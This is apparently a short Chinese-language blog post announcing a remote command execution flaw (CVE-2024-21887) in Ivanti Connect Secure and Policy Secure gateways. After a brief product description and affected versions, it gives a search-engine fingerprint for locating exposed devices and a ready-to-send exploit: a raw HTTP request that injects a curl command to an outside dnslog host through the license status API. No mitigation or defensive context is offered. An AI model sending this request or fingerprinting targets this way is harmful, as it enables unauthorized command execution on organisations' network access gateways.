叮～你有新的速递！CVE-2024-21887 RCE漏洞（附EXP）

0x01 前言

NIvanti Policy Secure为所有本地和远程端点提供全面可视性和网络访问控制（NAC）。它的高性能开放式设计有助于大小企业轻松执行端点安全合规策略和零信任安全。该系统存在RCE漏洞，攻击者可以利用此漏洞执行任意命令，执行任意命令，通过该漏洞可以获取服务器权限。

0x02 影响平台

Ivanti Connect Secure (9.x, 22.x) Ivanti Policy Secure (9.x, 22.x)

0x03 漏洞复现

搜索语法

body="welcome.cgi?p=logo"

页面是这个酱紫

EXP如下：

GET /api/v1/license/keys-status/%3bcurl%20639gmb.dnslog.cn HTTP/1.1Host: ip:portSec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9X-Forwarded-For: 127.0.0.1Connection: close